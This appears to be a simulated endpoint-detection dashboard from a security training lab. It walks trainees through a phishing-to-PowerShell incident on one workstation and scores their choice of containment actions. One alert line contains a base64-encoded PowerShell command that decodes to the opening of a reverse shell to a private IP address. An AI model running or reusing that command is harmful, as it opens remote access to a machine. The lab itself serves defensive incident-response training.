Endpoint Defense Lab

EDR Dashboard

Active Alerts

+3 from yesterday

Protected Endpoints

All up-to-date

Threats Blocked (30d)

245

-12% from last month

Recent Alerts

Status	Severity	Alert Name	Endpoint	Time
New	Critical	Suspicious PowerShell Execution	DESKTOP-HRLP421	10:42 AM
New	High	Multiple Failed Login Attempts	LAPTOP-MGRS193	09:23 AM
Investigating	High	Suspicious File Detected	WORKSTATION-F251	Yesterday, 18:12 PM
Resolved	Medium	Unusual Network Connection	DESKTOP-KTR932	Yesterday, 14:30 PM

Endpoint Security Status

Total Endpoints

Online

Offline

Endpoints with Active Alerts

Endpoints Requiring Attention

Agent Version

v4.2.1

Threat Investigation

Endpoint Information: DESKTOP-HRLP421

Hostname

DESKTOP-HRLP421

IP Address

192.168.1.45

Operating System

Windows 10 Pro

Last User

jsmith@company.com

Agent Version

v4.2.1

Status

Compromised

Event Timeline

Process Tree

File Analysis

Network Connections

10:42:15 AM Critical Alert

Suspicious PowerShell Execution

PowerShell executed with encoded command parameters, potentially attempting to evade detection.

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADEALgAxADAAMAAiACwANAA0ADMANQAPAA0ACgAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkA

10:42:10 AM

Process Created: PowerShell.exe

PowerShell process created by cmd.exe with parent process explorer.exe

10:41:48 AM

File Created: invoice_details.vbs

VBS script file created in user download directory

Path: C:\Users\jsmith\Downloads\invoice_details.vbs Size: 4.3 KB MD5: e5b844b77f44a36a8ab9f682c0e5be6e

10:41:30 AM

Network Connection: outlook.exe

Established connection to mail server

10:41:15 AM

File Downloaded: Q2_invoice.doc

Document file downloaded via Outlook from external email address

10:40:21 AM

Process Started: outlook.exe

Email client launched by user

Response Actions

Respond to the Detected Threat

Based on your investigation, select the appropriate response actions to contain and remediate the detected threat on endpoint DESKTOP-HRLP421.

Available Actions

Network Isolation

Isolate the endpoint from the network while maintaining EDR communication for investigation.

Kill Process

Terminate a malicious or suspicious process running on the endpoint.

Delete File

Remove a malicious file from the endpoint.

Quarantine File

Move a suspicious file to a secure quarantine location for further analysis.

Block File Hash

Prevent execution of files matching a specific hash across all endpoints.

Block IP Address

Block communication with a suspicious or malicious IP address.

Full System Scan

Initiate a comprehensive scan of the endpoint to detect additional threats.

Restart Endpoint

Reboot the endpoint to apply changes or interrupt malicious activity.

Response Score

70%

Your response is on the right track, but there are additional actions that could improve containment.

Threat Containment

75%

Evidence Preservation

90%

Business Impact

65%

Navigation